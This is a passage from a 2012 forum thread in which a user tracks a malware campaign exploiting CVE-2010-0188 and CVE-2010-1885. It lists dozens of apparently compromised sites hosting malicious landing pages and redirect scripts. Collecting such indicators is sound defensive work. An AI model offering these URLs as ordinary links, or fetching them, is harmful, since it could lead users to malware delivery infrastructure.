    jojovintage.com.ar/XcLNkR7t/index.html
    kocsigorta.com.tr/29rZYVvY/index.html
    luigitomasoni.altervista.org/GdpEPG6m/index.html
    mail.news.marbona.ro/HYfgma9c/index.html
    metally.com.br/2yLAvXvs/index.html
    novarestobar.pl/BZBmikS1/index.html
    ratanmani.com/HYfgma9c/index.html
    saadetle.com/BZBmikS1/index.html
    seeker.co.nz/HYfgma9c/index.html
    sexybunnylove.com/2yLAvXvs/index.html
    tcm.com.tr/BZBmikS1/index.html
    tqlaboratorios.com/yXtPP0kN/index.html
    trendyfunwear.nl/0aGbTUcC/index.html
    10354.w54.wedos.net/qJQ0G8Ak/index.html

    goat-it.com/KQss1aWQ/js.js

     Data that is stored in the cloud may become lost in the fog.

  29. User picture
    • NotBuyingIt on Sat 31 Mar 2012
    • 03:01:08 PM UTC

    RE: Pol.jar malware (CVE-2010-1885)

    A variety of exploits are being seen by the malware campaign(s) followed in this thread. A newly published discussion of one of them is at
    http://garwarner.blogspot.com/2012/03/usps-click-n...

     Data that is stored in the cloud may become lost in the fog.

  30. User picture
    • NotBuyingIt on Sun 01 Apr 2012
    • 12:23:08 AM UTC

    RE: Pol.jar malware (CVE-2010-0188, CVE-2010-1885)

    20rueraspail.be/LypmU2em/index.html
    aciesse.it/cKAf4D1t/index.html
    aqua-beach-club-torre-del-greco.it/29rZYVvY/index.html
    fhc-p.org/CYagS9aU/index.html
    gnet.com.bd/Yyepruav/index.html
    gtr.hr/29rZYVvY/index.html
    hilalyapi.org/HYfgma9c/index.html
    indosmsfree.com/GdpEPG6m/index.html
    jbcapetown.101.es/HYfgma9c/index.html
    lvqr.101.es/BZBmikS1/index.html
    raintrain.de/rfcEctFD/index.html
    rtsearch.com/NQLG54qb/index.html

    nacionalsaude.com.br/rgYbgjdk/js.js
    pqnosdetalhes.com.br/eppLG6kE/js.js
    schluesseldienst-golz.de/MsgPLeUX/js.js
    update-informatique.com/uzCeGFdr/js.js

    [Edit: Added more sites (below) 01-April-2012 06:50 UTC]

    datasig.com.ar/0iBzU8pv/index.html
    merkez-otomotiv.com/cs1TiGfh/index.html
    h7xb37qx.utawebhost.at/9hEetc63/index.html
    ftp.wsop.pl/LzZWrHj5/index.html

    laspeziacaritas.it/1M4VoeVe/js.js
    ftp.planitur.com.br/dyEmcL4N/js.js
    quiztown.org/U2iBLpvu/js.js
    wap.tl/8M6kMfpV/js.js
    webizleme.com/e2htJnFF/js.js

    [Edit: Added site 01-April-2012 15:40 UTC]

    207.57.244.55/cKAf4D1t/index.html
    www.bairskeystone.com/cKAf4D1t/index.html (equivalent to IP 207.57.244.55)

     Data that is stored in the cloud may become lost in the fog.